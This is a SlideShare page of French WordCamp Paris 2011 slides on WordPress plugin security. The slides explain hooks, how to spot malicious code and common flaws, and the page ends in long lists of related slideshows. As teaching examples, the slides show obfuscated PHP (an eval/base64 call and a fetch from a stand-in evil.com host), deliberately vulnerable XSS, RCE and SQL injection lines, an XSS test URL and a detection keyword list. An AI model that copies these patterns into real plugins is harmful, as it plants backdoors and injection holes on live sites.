SlideShare une entreprise Scribd logo

Wordpress et la sécurité des plugins

Télécharger en tant que PPT, PDF
B
Boiteaweb

Slide de @BoiteAWeb (Julio Potier) pour la WordCamp Paris 2011, le 25 nov. 2011. http://baw.li/wcp2011

Technologie
1  sur  17
WordPress et la Sécurité des Plugins WordPress Francophone ~ Julio Potier ~ @boiteaweb ~ WordCamp Paris 2011 ~
1) C'est quoi un plugin et comment ça marche ?   2) Pourquoi un plugin peut contenir une vulnérabilité ?   3) Peut-on et comment détecter du code malveillant ?   4) Les différentes failles les plus répandues.   5) Sélection de plugin Sécurité pour votre site. Bonus) Sécuriser WordPress au delà des plugins. WordPress Francophone Sommaire
Un Plugin : C'est quoi ? Ensemble de fonctions qui viennent se greffer sur votre site dans le but de l’améliorer ou d’ajouter des fonctionnalités. Et comment ça marche ? Un plugin va utiliser ce qu’on apelle les “hooks” qui signifie “hameçons”. Un hook est un point d’entrée dans une fonction WordPress. WordPress Francophone
Pourquoi un Plugin peut contenir une vulnérabilité : #1 Acte volontaire de nuire   #2 Le manque d'information du développeur #3 L'indifférence du développeur #4 Nouvelles découvertes de failles #5 Repository WordPress piraté WordPress Francophone
Peut-on et comment détecter du code malveillant ? : Exemples de codes malveillants :   eval( base64_decode( "ZWNobyAkX09QVElPTlNbJ2UnXQ==" ) ); $a='http://www.'; $b='evil'; $c='.com/script.php'; $content = file_get_contents( $a.$b.$c ); $b(); // Équivaut à evil(); WordPress Francophone
Peut-on et comment détecter du code malveillant ? : Exemple de code non caché : WordPress Francophone echo $_GET['e']; // XSS eval( $_GET['e'] ); // RCE $wpdb->query( $_GET['e'] ); // SQLi "eval","base64","rot13","include","require","mail","wp_mail" Quelques mots-clés :
Comment choisir son Plugin : # Regarder le nombre de téléchargements # Lire le Changelog à la recherche de correctifs sécu # Trouver la date de création du plugin # Chercher sur Google "security" ou "problem" ou "exploit" ou "faille" suivi du nom du plugin # Lire les commentaires et avis sur les forums liés # Tester le plugin sur un site test ou en local # Le faire auditer si le doute subsiste WordPress Francophone
Comment choisir son Thème : # Regarder le nombre de téléchargements # Lire le Changelog à la recherche de correctifs sécu # Trouver la date de mise à jour du thème # Chercher sur Google "security" ou "problem" ou "exploit" ou "faille" suivi du nom du thème # Lire les commentaires et avis sur les forums liés # Tester le thème sur un site test ou en local # Le faire auditer si le doute subsiste WordPress Francophone # Le trouver sur un site sérieux et compétent # Le faire faire par un intégrateur professionnel
Les failles les plus répandues : XSS - C ross ( X ) S ite S cripting http://baw.li/dico/XSS WordPress Francophone Bonjour <?= $_GET['log'] ?> ! http://target.com/?log=<script>alert(&quot;This is a XSS vuln for #WCP2011&quot;);</script>
Les failles les plus répandues : XSS - C ross ( X ) S ite S cripting http://baw.li/dico/XSS WordPress Francophone <input value=&quot;<?= $opts['log'] ?>&quot; /> $opts = get_option( 'mon_plugin' );
Les failles les plus répandues : CSRF - C ross ( X ) S ite R equest F orgery   http://baw.li/dico/CSRF WordPress Francophone <form> <input name=&quot;option&quot; value=&quot;evil&quot; /> <input type=&quot;submit&quot; /> </form> Un token sécurité est manquant ! <input name=&quot;_wpnonce&quot; value=&quot;j2u1l1i2op&quot; />
Les failles les plus répandues : SQLi - S imple Q uery L anguage I njection http://baw.li/dico/sqli WordPress Francophone $wpdb->query( 'SELECT user_login FROM wp_users WHERE user_login = ' . $opts['log'] ); Les requêtes doivent être préparées ! $wpdb->query( $wpdb->prepare( 'SELECT user_login FROM wp_users WHERE user_login = %s', $opts['log'] ) );
Vidéo Démo WordPress Francophone http://baw.li/1334
Liste non exhaustive de Plugins # AntiVirus # AskApache Password Protect # BulletProof Security # Secure WordPress et WP Security Scan # Exploit Scanner # Ultimate Security Checker # WordPress Plugin Security Checker # Chap Secure Login # Login Lock # One Time Password # User Role Editor # BackWPUp # Audit Trail # WordPress Firewall (!!!) WordPress Francophone
Bonus : Sécuriser WordPress au delà des Plugins # Faites des sauvegardes régulières. # Tenez WordPress et ses plugins et thèmes à jour. # Déplacez wp-config.php d’un cran dans votre arborescence. # Choisissez un bon mot de passe. # Modifiez le préfixe &quot; wp_ &quot; de votre base de données. # Supprimez le compte “ admin ”. # Ajoutez un “ Options -Indexes ” dans votre .htaccess. # Installer quelques un des plugins cités précédemment. # Cacher le n° de version ? Non ... WordPress Francophone
Livres
Merci ! WordPress Francophone http://studio-raspail.fr http://wordpress-fr.net http://wp-themes-pro.com http://screenfeed.fr http://seomix.fr http://geekeries.fr @screenfeedfr @rochdaniel @geekeriesfr @wordpress_fr @wp_themes_pro Retrouvez ce slide sur http://boiteaweb.fr/wcp2011

Recommandé

Trouvez le Thème WordPress Idéal - WordCamp 2014
Trouvez le Thème WordPress Idéal - WordCamp 2014Trouvez le Thème WordPress Idéal - WordCamp 2014
Trouvez le Thème WordPress Idéal - WordCamp 2014Alex Bortolotti
 
WordPress en tant que CMS
WordPress en tant que CMSWordPress en tant que CMS
WordPress en tant que CMSAurélien Denis
 
Les 10 Erreurs des Debutants avec WordPress
Les 10 Erreurs des Debutants avec WordPressLes 10 Erreurs des Debutants avec WordPress
Les 10 Erreurs des Debutants avec WordPressNicolas Richer
 
WordPress + HTTPS
WordPress + HTTPSWordPress + HTTPS
WordPress + HTTPSBrice Capobianco
 
Démarrer son site WordPress : LA "to-do" list
Démarrer son site WordPress : LA "to-do" listDémarrer son site WordPress : LA "to-do" list
Démarrer son site WordPress : LA "to-do" listKaylynne Johnson
 
Presentation wc
Presentation wcPresentation wc
Presentation wcEmilie LEBRUN
 
Optimiser son référencement WordPress - QueDuWeb 2016
Optimiser son référencement WordPress - QueDuWeb 2016Optimiser son référencement WordPress - QueDuWeb 2016
Optimiser son référencement WordPress - QueDuWeb 2016Daniel Roch - SeoMix
 
La guerre SEO du CMS : WordPress VS Drupal
La guerre SEO du CMS : WordPress VS DrupalLa guerre SEO du CMS : WordPress VS Drupal
La guerre SEO du CMS : WordPress VS DrupalDaniel Roch - SeoMix
 

Recommandé

Trouvez le Thème WordPress Idéal - WordCamp 2014
Trouvez le Thème WordPress Idéal - WordCamp 2014Trouvez le Thème WordPress Idéal - WordCamp 2014
Trouvez le Thème WordPress Idéal - WordCamp 2014Alex Bortolotti
 
WordPress en tant que CMS
WordPress en tant que CMSWordPress en tant que CMS
WordPress en tant que CMSAurélien Denis
 
Les 10 Erreurs des Debutants avec WordPress
Les 10 Erreurs des Debutants avec WordPressLes 10 Erreurs des Debutants avec WordPress
Les 10 Erreurs des Debutants avec WordPressNicolas Richer
 
WordPress + HTTPS
WordPress + HTTPSWordPress + HTTPS
WordPress + HTTPSBrice Capobianco
 
Démarrer son site WordPress : LA "to-do" list
Démarrer son site WordPress : LA "to-do" listDémarrer son site WordPress : LA "to-do" list
Démarrer son site WordPress : LA "to-do" listKaylynne Johnson
 
Presentation wc
Presentation wcPresentation wc
Presentation wcEmilie LEBRUN
 
Optimiser son référencement WordPress - QueDuWeb 2016
Optimiser son référencement WordPress - QueDuWeb 2016Optimiser son référencement WordPress - QueDuWeb 2016
Optimiser son référencement WordPress - QueDuWeb 2016Daniel Roch - SeoMix
 
La guerre SEO du CMS : WordPress VS Drupal
La guerre SEO du CMS : WordPress VS DrupalLa guerre SEO du CMS : WordPress VS Drupal
La guerre SEO du CMS : WordPress VS DrupalDaniel Roch - SeoMix
 
Combien coûte un site WordPress ? - Wordcamp Paris 2014
Combien coûte un site WordPress ? - Wordcamp Paris 2014Combien coûte un site WordPress ? - Wordcamp Paris 2014
Combien coûte un site WordPress ? - Wordcamp Paris 2014Thierry Pigot
 
Le meilleur pour votre site WordPress
Le meilleur pour votre site WordPressLe meilleur pour votre site WordPress
Le meilleur pour votre site WordPressAurélien Denis
 
WordPress + ACF – Vers l’infini et au-delà…
WordPress + ACF – Vers l’infini et au-delà…WordPress + ACF – Vers l’infini et au-delà…
WordPress + ACF – Vers l’infini et au-delà…Brice Capobianco
 
Optimiser réellement le référencement naturel de WordPress
Optimiser réellement le référencement naturel de WordPressOptimiser réellement le référencement naturel de WordPress
Optimiser réellement le référencement naturel de WordPressDaniel Roch - SeoMix
 
Manuel wordpress ad avenue
Manuel wordpress ad avenueManuel wordpress ad avenue
Manuel wordpress ad avenueFrançois Huynh
 
Pensez Web-Performances avec WordPress - Une conférence de Julien Oger et Pie...
Pensez Web-Performances avec WordPress - Une conférence de Julien Oger et Pie...Pensez Web-Performances avec WordPress - Une conférence de Julien Oger et Pie...
Pensez Web-Performances avec WordPress - Une conférence de Julien Oger et Pie...pierredargham
 
WordPress et Ninja forms
WordPress et Ninja formsWordPress et Ninja forms
WordPress et Ninja formsBrice Capobianco
 
Wordpress et SEO - Campus Made in Blog 2014 Montréal
Wordpress et SEO - Campus Made in Blog 2014 MontréalWordpress et SEO - Campus Made in Blog 2014 Montréal
Wordpress et SEO - Campus Made in Blog 2014 MontréalMade in
 
WordPress et SEO - SEOCampus 2013
WordPress et SEO - SEOCampus 2013WordPress et SEO - SEOCampus 2013
WordPress et SEO - SEOCampus 2013Daniel Roch - SeoMix
 
L’envers du décor d’un site WooCommerce | WP Tech Nantes
L’envers du décor d’un site WooCommerce | WP Tech NantesL’envers du décor d’un site WooCommerce | WP Tech Nantes
L’envers du décor d’un site WooCommerce | WP Tech NantesFabrice Ducarme
 
Optimiser les performances dans Wordpress
Optimiser les performances dans WordpressOptimiser les performances dans Wordpress
Optimiser les performances dans WordpressNicolas Juen
 
Wordpress notes de cours
Wordpress notes de coursWordpress notes de cours
Wordpress notes de coursmichel.titeux
 
Initiation à WordPress
Initiation à WordPressInitiation à WordPress
Initiation à WordPressStrategiaWeb Communication Numérique
 
WordPress
WordPressWordPress
WordPressThomas Bodin
 
Libérez le potentiel de WordPress
Libérez le potentiel de WordPressLibérez le potentiel de WordPress
Libérez le potentiel de WordPressDaniel Roch - SeoMix
 
Ouvrir vos plugins aux autres développeurs - WPTech Nantes
Ouvrir vos plugins aux autres développeurs - WPTech NantesOuvrir vos plugins aux autres développeurs - WPTech Nantes
Ouvrir vos plugins aux autres développeurs - WPTech Nantescorsonr
 
10 conseils pour booster les performances de votre site sous WordPress
10 conseils pour booster les performances de votre site sous WordPress10 conseils pour booster les performances de votre site sous WordPress
10 conseils pour booster les performances de votre site sous WordPressAurélien Denis
 
Conception de thèmes WordPress : construire et optimiser son espace de travail
Conception de thèmes WordPress : construire et optimiser son espace de travailConception de thèmes WordPress : construire et optimiser son espace de travail
Conception de thèmes WordPress : construire et optimiser son espace de travailFrédérique Game
 
64 conneries que font les référenceurs avec WordPress
64 conneries que font les référenceurs avec WordPress64 conneries que font les référenceurs avec WordPress
64 conneries que font les référenceurs avec WordPressAurélien Denis
 
Le contenu est roi
Le contenu est roiLe contenu est roi
Le contenu est roiMaximilien Labadie
 
Fast food
Fast foodFast food
Fast foodKarine Melo
 
οι πιο ομορφες φωτογραφιες
οι πιο ομορφες φωτογραφιεςοι πιο ομορφες φωτογραφιες
οι πιο ομορφες φωτογραφιεςdimgaloutzis3
 

Contenu connexe

Tendances

Combien coûte un site WordPress ? - Wordcamp Paris 2014
Combien coûte un site WordPress ? - Wordcamp Paris 2014Combien coûte un site WordPress ? - Wordcamp Paris 2014
Combien coûte un site WordPress ? - Wordcamp Paris 2014Thierry Pigot
 
Le meilleur pour votre site WordPress
Le meilleur pour votre site WordPressLe meilleur pour votre site WordPress
Le meilleur pour votre site WordPressAurélien Denis
 
WordPress + ACF – Vers l’infini et au-delà…
WordPress + ACF – Vers l’infini et au-delà…WordPress + ACF – Vers l’infini et au-delà…
WordPress + ACF – Vers l’infini et au-delà…Brice Capobianco
 
Optimiser réellement le référencement naturel de WordPress
Optimiser réellement le référencement naturel de WordPressOptimiser réellement le référencement naturel de WordPress
Optimiser réellement le référencement naturel de WordPressDaniel Roch - SeoMix
 
Manuel wordpress ad avenue
Manuel wordpress ad avenueManuel wordpress ad avenue
Manuel wordpress ad avenueFrançois Huynh
 
Pensez Web-Performances avec WordPress - Une conférence de Julien Oger et Pie...
Pensez Web-Performances avec WordPress - Une conférence de Julien Oger et Pie...Pensez Web-Performances avec WordPress - Une conférence de Julien Oger et Pie...
Pensez Web-Performances avec WordPress - Une conférence de Julien Oger et Pie...pierredargham
 
Wordpress et SEO - Campus Made in Blog 2014 Montréal
Wordpress et SEO - Campus Made in Blog 2014 MontréalWordpress et SEO - Campus Made in Blog 2014 Montréal
Wordpress et SEO - Campus Made in Blog 2014 MontréalMade in
 
L’envers du décor d’un site WooCommerce | WP Tech Nantes
L’envers du décor d’un site WooCommerce | WP Tech NantesL’envers du décor d’un site WooCommerce | WP Tech Nantes
L’envers du décor d’un site WooCommerce | WP Tech NantesFabrice Ducarme
 
Optimiser les performances dans Wordpress
Optimiser les performances dans WordpressOptimiser les performances dans Wordpress
Optimiser les performances dans WordpressNicolas Juen
 
Wordpress notes de cours
Wordpress notes de coursWordpress notes de cours
Wordpress notes de coursmichel.titeux
 
Libérez le potentiel de WordPress
Libérez le potentiel de WordPressLibérez le potentiel de WordPress
Libérez le potentiel de WordPressDaniel Roch - SeoMix
 
Ouvrir vos plugins aux autres développeurs - WPTech Nantes
Ouvrir vos plugins aux autres développeurs - WPTech NantesOuvrir vos plugins aux autres développeurs - WPTech Nantes
Ouvrir vos plugins aux autres développeurs - WPTech Nantescorsonr
 
10 conseils pour booster les performances de votre site sous WordPress
10 conseils pour booster les performances de votre site sous WordPress10 conseils pour booster les performances de votre site sous WordPress
10 conseils pour booster les performances de votre site sous WordPressAurélien Denis
 
Conception de thèmes WordPress : construire et optimiser son espace de travail
Conception de thèmes WordPress : construire et optimiser son espace de travailConception de thèmes WordPress : construire et optimiser son espace de travail
Conception de thèmes WordPress : construire et optimiser son espace de travailFrédérique Game
 
64 conneries que font les référenceurs avec WordPress
64 conneries que font les référenceurs avec WordPress64 conneries que font les référenceurs avec WordPress
64 conneries que font les référenceurs avec WordPressAurélien Denis
 

Tendances (19)

Combien coûte un site WordPress ? - Wordcamp Paris 2014
Combien coûte un site WordPress ? - Wordcamp Paris 2014Combien coûte un site WordPress ? - Wordcamp Paris 2014
Combien coûte un site WordPress ? - Wordcamp Paris 2014
 
Le meilleur pour votre site WordPress
Le meilleur pour votre site WordPressLe meilleur pour votre site WordPress
Le meilleur pour votre site WordPress
 
WordPress + ACF – Vers l’infini et au-delà…
WordPress + ACF – Vers l’infini et au-delà…WordPress + ACF – Vers l’infini et au-delà…
WordPress + ACF – Vers l’infini et au-delà…
 
Optimiser réellement le référencement naturel de WordPress
Optimiser réellement le référencement naturel de WordPressOptimiser réellement le référencement naturel de WordPress
Optimiser réellement le référencement naturel de WordPress
 
Manuel wordpress ad avenue
Manuel wordpress ad avenueManuel wordpress ad avenue
Manuel wordpress ad avenue
 
Pensez Web-Performances avec WordPress - Une conférence de Julien Oger et Pie...
Pensez Web-Performances avec WordPress - Une conférence de Julien Oger et Pie...Pensez Web-Performances avec WordPress - Une conférence de Julien Oger et Pie...
Pensez Web-Performances avec WordPress - Une conférence de Julien Oger et Pie...
 
WordPress et Ninja forms
WordPress et Ninja formsWordPress et Ninja forms
WordPress et Ninja forms
 
Wordpress et SEO - Campus Made in Blog 2014 Montréal
Wordpress et SEO - Campus Made in Blog 2014 MontréalWordpress et SEO - Campus Made in Blog 2014 Montréal
Wordpress et SEO - Campus Made in Blog 2014 Montréal
 
WordPress et SEO - SEOCampus 2013
WordPress et SEO - SEOCampus 2013WordPress et SEO - SEOCampus 2013
WordPress et SEO - SEOCampus 2013
 
L’envers du décor d’un site WooCommerce | WP Tech Nantes
L’envers du décor d’un site WooCommerce | WP Tech NantesL’envers du décor d’un site WooCommerce | WP Tech Nantes
L’envers du décor d’un site WooCommerce | WP Tech Nantes
 
Optimiser les performances dans Wordpress
Optimiser les performances dans WordpressOptimiser les performances dans Wordpress
Optimiser les performances dans Wordpress
 
Wordpress notes de cours
Wordpress notes de coursWordpress notes de cours
Wordpress notes de cours
 
Initiation à WordPress
Initiation à WordPressInitiation à WordPress
Initiation à WordPress
 
WordPress
WordPressWordPress
WordPress
 
Libérez le potentiel de WordPress
Libérez le potentiel de WordPressLibérez le potentiel de WordPress
Libérez le potentiel de WordPress
 
Ouvrir vos plugins aux autres développeurs - WPTech Nantes
Ouvrir vos plugins aux autres développeurs - WPTech NantesOuvrir vos plugins aux autres développeurs - WPTech Nantes
Ouvrir vos plugins aux autres développeurs - WPTech Nantes
 
10 conseils pour booster les performances de votre site sous WordPress
10 conseils pour booster les performances de votre site sous WordPress10 conseils pour booster les performances de votre site sous WordPress
10 conseils pour booster les performances de votre site sous WordPress
 
Conception de thèmes WordPress : construire et optimiser son espace de travail
Conception de thèmes WordPress : construire et optimiser son espace de travailConception de thèmes WordPress : construire et optimiser son espace de travail
Conception de thèmes WordPress : construire et optimiser son espace de travail
 
64 conneries que font les référenceurs avec WordPress
64 conneries que font les référenceurs avec WordPress64 conneries que font les référenceurs avec WordPress
64 conneries que font les référenceurs avec WordPress
 

En vedette

οι πιο ομορφες φωτογραφιες
οι πιο ομορφες φωτογραφιεςοι πιο ομορφες φωτογραφιες
οι πιο ομορφες φωτογραφιεςdimgaloutzis3
 
Human health fact sheet slideshare
Human health fact sheet slideshareHuman health fact sheet slideshare
Human health fact sheet slideshareSami Colenutt
 
최신작게임『SX797』『СOM』모바일바카라
최신작게임『SX797』『СOM』모바일바카라최신작게임『SX797』『СOM』모바일바카라
최신작게임『SX797』『СOM』모바일바카라hdlkfjgldf
 
What are the UN SDGs and what do they mean for libraries?
What are the UN SDGs and what do they mean for libraries?What are the UN SDGs and what do they mean for libraries?
What are the UN SDGs and what do they mean for libraries?blisspix
 
A publicar
A publicarA publicar
A publicarmamefle
 
Οι αντιδράσεις των αντιπάλων μετά την ήττα στους Αιγός Ποταμούς
Οι αντιδράσεις των αντιπάλων μετά την ήττα στους Αιγός ΠοταμούςΟι αντιδράσεις των αντιπάλων μετά την ήττα στους Αιγός Ποταμούς
Οι αντιδράσεις των αντιπάλων μετά την ήττα στους Αιγός ΠοταμούςAkis Ampelas
 
Prezentashka
PrezentashkaPrezentashka
PrezentashkaMarry13
 
December 9 (womens right)
December 9 (womens right)December 9 (womens right)
December 9 (womens right)AIMEC Reporter
 
Annual stat report_2015_gr
Annual stat report_2015_grAnnual stat report_2015_gr
Annual stat report_2015_grEthos Media S.A.
 
κβαντική θεωρία – η ψυχή περνά σε άλλο σύμπαν μετά τον θάνατο
κβαντική θεωρία – η ψυχή περνά σε άλλο σύμπαν μετά τον θάνατοκβαντική θεωρία – η ψυχή περνά σε άλλο σύμπαν μετά τον θάνατο
κβαντική θεωρία – η ψυχή περνά σε άλλο σύμπαν μετά τον θάνατοalex gr
 
Sony PP - Isabelle Thommen
Sony PP - Isabelle ThommenSony PP - Isabelle Thommen
Sony PP - Isabelle Thommenisabelle23
 
ITD Design design process journal brief
ITD Design design process journal briefITD Design design process journal brief
ITD Design design process journal briefMadeline Liew
 
Τέσσερα κείμενα με θέμα την Παιδεία
Τέσσερα κείμενα με θέμα την ΠαιδείαΤέσσερα κείμενα με θέμα την Παιδεία
Τέσσερα κείμενα με θέμα την ΠαιδείαEleni Kots
 
Wedding planner Servics Delhi,Faridabad,Gurgaon,Noida
Wedding planner Servics Delhi,Faridabad,Gurgaon,NoidaWedding planner Servics Delhi,Faridabad,Gurgaon,Noida
Wedding planner Servics Delhi,Faridabad,Gurgaon,NoidaWeddingpreps Support
 

En vedette (20)

Le contenu est roi
Le contenu est roiLe contenu est roi
Le contenu est roi
 
Fast food
Fast foodFast food
Fast food
 
οι πιο ομορφες φωτογραφιες
οι πιο ομορφες φωτογραφιεςοι πιο ομορφες φωτογραφιες
οι πιο ομορφες φωτογραφιες
 
Human health fact sheet slideshare
Human health fact sheet slideshareHuman health fact sheet slideshare
Human health fact sheet slideshare
 
최신작게임『SX797』『СOM』모바일바카라
최신작게임『SX797』『СOM』모바일바카라최신작게임『SX797』『СOM』모바일바카라
최신작게임『SX797』『СOM』모바일바카라
 
What are the UN SDGs and what do they mean for libraries?
What are the UN SDGs and what do they mean for libraries?What are the UN SDGs and what do they mean for libraries?
What are the UN SDGs and what do they mean for libraries?
 
A publicar
A publicarA publicar
A publicar
 
Design fest
Design festDesign fest
Design fest
 
Οι αντιδράσεις των αντιπάλων μετά την ήττα στους Αιγός Ποταμούς
Οι αντιδράσεις των αντιπάλων μετά την ήττα στους Αιγός ΠοταμούςΟι αντιδράσεις των αντιπάλων μετά την ήττα στους Αιγός Ποταμούς
Οι αντιδράσεις των αντιπάλων μετά την ήττα στους Αιγός Ποταμούς
 
Βουλιμία
Βουλιμία Βουλιμία
Βουλιμία
 
Prezentashka
PrezentashkaPrezentashka
Prezentashka
 
December 9 (womens right)
December 9 (womens right)December 9 (womens right)
December 9 (womens right)
 
2010 Nissan Rogue Los Angeles
2010 Nissan Rogue Los Angeles2010 Nissan Rogue Los Angeles
2010 Nissan Rogue Los Angeles
 
Annual stat report_2015_gr
Annual stat report_2015_grAnnual stat report_2015_gr
Annual stat report_2015_gr
 
κβαντική θεωρία – η ψυχή περνά σε άλλο σύμπαν μετά τον θάνατο
κβαντική θεωρία – η ψυχή περνά σε άλλο σύμπαν μετά τον θάνατοκβαντική θεωρία – η ψυχή περνά σε άλλο σύμπαν μετά τον θάνατο
κβαντική θεωρία – η ψυχή περνά σε άλλο σύμπαν μετά τον θάνατο
 
Sony PP - Isabelle Thommen
Sony PP - Isabelle ThommenSony PP - Isabelle Thommen
Sony PP - Isabelle Thommen
 
ITD Design design process journal brief
ITD Design design process journal briefITD Design design process journal brief
ITD Design design process journal brief
 
Τέσσερα κείμενα με θέμα την Παιδεία
Τέσσερα κείμενα με θέμα την ΠαιδείαΤέσσερα κείμενα με θέμα την Παιδεία
Τέσσερα κείμενα με θέμα την Παιδεία
 
Wedding planner Servics Delhi,Faridabad,Gurgaon,Noida
Wedding planner Servics Delhi,Faridabad,Gurgaon,NoidaWedding planner Servics Delhi,Faridabad,Gurgaon,Noida
Wedding planner Servics Delhi,Faridabad,Gurgaon,Noida
 
Υπερτροφές
ΥπερτροφέςΥπερτροφές
Υπερτροφές
 

Similaire à Wordpress et la sécurité des plugins

Techdays 2010 : comment hacker PHP sans se fatiguer
Techdays 2010 : comment hacker PHP sans se fatiguerTechdays 2010 : comment hacker PHP sans se fatiguer
Techdays 2010 : comment hacker PHP sans se fatiguerDamien Seguy
 
Enrichir vos contenus Wordpress avec les API - WPTech 2015
Enrichir vos contenus Wordpress avec les API - WPTech 2015Enrichir vos contenus Wordpress avec les API - WPTech 2015
Enrichir vos contenus Wordpress avec les API - WPTech 2015PXNetwork
 
Sécuriser un site WordPress - Semaine du web
Sécuriser un site WordPress - Semaine du webSécuriser un site WordPress - Semaine du web
Sécuriser un site WordPress - Semaine du webNour El Houda
 
Sécuriser un site Wordpress
Sécuriser un site WordpressSécuriser un site Wordpress
Sécuriser un site Wordpressbestyuna
 
Sécuriser un site WordPress - Semaine du web
Sécuriser un site WordPress - Semaine du webSécuriser un site WordPress - Semaine du web
Sécuriser un site WordPress - Semaine du webIZZA Samir
 
Sécurité WordPress
Sécurité WordPressSécurité WordPress
Sécurité WordPressChi Nacim
 
Prévention et traitement du hack de serveurs
Prévention et traitement du hack de serveursPrévention et traitement du hack de serveurs
Prévention et traitement du hack de serveursAmen.fr
 
Accroître la sécurité de son site internet et de Joomla! plus spécifiquement
Accroître la sécurité de son site internet et de Joomla! plus spécifiquementAccroître la sécurité de son site internet et de Joomla! plus spécifiquement
Accroître la sécurité de son site internet et de Joomla! plus spécifiquementChristophe Avonture
 
Performance et optimisation de PrestaShop
Performance et optimisation de PrestaShopPerformance et optimisation de PrestaShop
Performance et optimisation de PrestaShopPrestaShop
 
Javascript as a first programming language : votre IC prête pour la révolution !
Javascript as a first programming language : votre IC prête pour la révolution !Javascript as a first programming language : votre IC prête pour la révolution !
Javascript as a first programming language : votre IC prête pour la révolution !VISEO
 
Owasp et les failles des applications web
Owasp et les failles des applications webOwasp et les failles des applications web
Owasp et les failles des applications webHenrique Mukanda
 
Quoi de neuf dans Zend Framework 1.10 ?
Quoi de neuf dans Zend Framework 1.10 ?Quoi de neuf dans Zend Framework 1.10 ?
Quoi de neuf dans Zend Framework 1.10 ?Mickael Perraud
 

Similaire à Wordpress et la sécurité des plugins (20)

Techdays 2010 : comment hacker PHP sans se fatiguer
Techdays 2010 : comment hacker PHP sans se fatiguerTechdays 2010 : comment hacker PHP sans se fatiguer
Techdays 2010 : comment hacker PHP sans se fatiguer
 
Rmll.securite
Rmll.securiteRmll.securite
Rmll.securite
 
Enrichir vos contenus Wordpress avec les API - WPTech 2015
Enrichir vos contenus Wordpress avec les API - WPTech 2015Enrichir vos contenus Wordpress avec les API - WPTech 2015
Enrichir vos contenus Wordpress avec les API - WPTech 2015
 
Sécuriser un site WordPress - Semaine du web
Sécuriser un site WordPress - Semaine du webSécuriser un site WordPress - Semaine du web
Sécuriser un site WordPress - Semaine du web
 
Sécuriser un site Wordpress
Sécuriser un site WordpressSécuriser un site Wordpress
Sécuriser un site Wordpress
 
Sécuriser un site Wordpress
Sécuriser un site WordpressSécuriser un site Wordpress
Sécuriser un site Wordpress
 
Sécuriser un site WordPress - Semaine du web
Sécuriser un site WordPress - Semaine du webSécuriser un site WordPress - Semaine du web
Sécuriser un site WordPress - Semaine du web
 
Sécurité WordPress
Sécurité WordPressSécurité WordPress
Sécurité WordPress
 
Prévention et traitement du hack de serveurs
Prévention et traitement du hack de serveursPrévention et traitement du hack de serveurs
Prévention et traitement du hack de serveurs
 
Audit de site WordPress
Audit de site WordPressAudit de site WordPress
Audit de site WordPress
 
Accroître la sécurité de son site internet et de Joomla! plus spécifiquement
Accroître la sécurité de son site internet et de Joomla! plus spécifiquementAccroître la sécurité de son site internet et de Joomla! plus spécifiquement
Accroître la sécurité de son site internet et de Joomla! plus spécifiquement
 
Cours Php
Cours PhpCours Php
Cours Php
 
Cours Php
Cours PhpCours Php
Cours Php
 
Performance et optimisation de PrestaShop
Performance et optimisation de PrestaShopPerformance et optimisation de PrestaShop
Performance et optimisation de PrestaShop
 
Javascript as a first programming language : votre IC prête pour la révolution !
Javascript as a first programming language : votre IC prête pour la révolution !Javascript as a first programming language : votre IC prête pour la révolution !
Javascript as a first programming language : votre IC prête pour la révolution !
 
Owasp et les failles des applications web
Owasp et les failles des applications webOwasp et les failles des applications web
Owasp et les failles des applications web
 
Securité web
Securité webSecurité web
Securité web
 
Mysql
MysqlMysql
Mysql
 
Applets
AppletsApplets
Applets
 
Quoi de neuf dans Zend Framework 1.10 ?
Quoi de neuf dans Zend Framework 1.10 ?Quoi de neuf dans Zend Framework 1.10 ?
Quoi de neuf dans Zend Framework 1.10 ?
 

Plus de Boiteaweb

Couleurs & Accessibilité — BlendWebMix 2017
Couleurs & Accessibilité — BlendWebMix 2017Couleurs & Accessibilité — BlendWebMix 2017
Couleurs & Accessibilité — BlendWebMix 2017Boiteaweb
 
Mise à jour sur la sécurité WordPress – WordCamp Bordeaux 2017
Mise à jour sur la sécurité WordPress – WordCamp Bordeaux 2017Mise à jour sur la sécurité WordPress – WordCamp Bordeaux 2017
Mise à jour sur la sécurité WordPress – WordCamp Bordeaux 2017Boiteaweb
 
Transients are good for you - WordCamp London 2016
Transients are good for you - WordCamp London 2016Transients are good for you - WordCamp London 2016
Transients are good for you - WordCamp London 2016Boiteaweb
 
WordPress & les contributions — WordCamp Paris 2016
WordPress & les contributions — WordCamp Paris 2016WordPress & les contributions — WordCamp Paris 2016
WordPress & les contributions — WordCamp Paris 2016Boiteaweb
 
Comment créer des hooks dans vos développements WordPress - WP Tech 2015
Comment créer des hooks dans vos développements WordPress - WP Tech 2015Comment créer des hooks dans vos développements WordPress - WP Tech 2015
Comment créer des hooks dans vos développements WordPress - WP Tech 2015Boiteaweb
 
Pourquoi WordPress est le CMS le plus sécurisé ?
Pourquoi WordPress est le CMS le plus sécurisé ?Pourquoi WordPress est le CMS le plus sécurisé ?
Pourquoi WordPress est le CMS le plus sécurisé ?Boiteaweb
 
Freelance & WordPress (WordCamp Paris 2015)
Freelance & WordPress (WordCamp Paris 2015)Freelance & WordPress (WordCamp Paris 2015)
Freelance & WordPress (WordCamp Paris 2015)Boiteaweb
 
Comment se charge WordPress ? Le loading du core.
Comment se charge WordPress ? Le loading du core.Comment se charge WordPress ? Le loading du core.
Comment se charge WordPress ? Le loading du core.Boiteaweb
 
Colours and Accessibility (a11y) - WordCamp Europe 2014 Sofia
Colours and Accessibility (a11y) - WordCamp Europe 2014 SofiaColours and Accessibility (a11y) - WordCamp Europe 2014 Sofia
Colours and Accessibility (a11y) - WordCamp Europe 2014 SofiaBoiteaweb
 
Les données transitoires (transients) vous veulent du bien
Les données transitoires (transients) vous veulent du bienLes données transitoires (transients) vous veulent du bien
Les données transitoires (transients) vous veulent du bienBoiteaweb
 
Choisir les bons Hooks dans vos Développements WordPress
Choisir les bons Hooks dans vos Développements WordPressChoisir les bons Hooks dans vos Développements WordPress
Choisir les bons Hooks dans vos Développements WordPressBoiteaweb
 
10 façons de casser son site WordPress ... et de le réparer !
10 façons de casser son site WordPress ... et de le réparer !10 façons de casser son site WordPress ... et de le réparer !
10 façons de casser son site WordPress ... et de le réparer !Boiteaweb
 

Plus de Boiteaweb (12)

Couleurs & Accessibilité — BlendWebMix 2017
Couleurs & Accessibilité — BlendWebMix 2017Couleurs & Accessibilité — BlendWebMix 2017
Couleurs & Accessibilité — BlendWebMix 2017
 
Mise à jour sur la sécurité WordPress – WordCamp Bordeaux 2017
Mise à jour sur la sécurité WordPress – WordCamp Bordeaux 2017Mise à jour sur la sécurité WordPress – WordCamp Bordeaux 2017
Mise à jour sur la sécurité WordPress – WordCamp Bordeaux 2017
 
Transients are good for you - WordCamp London 2016
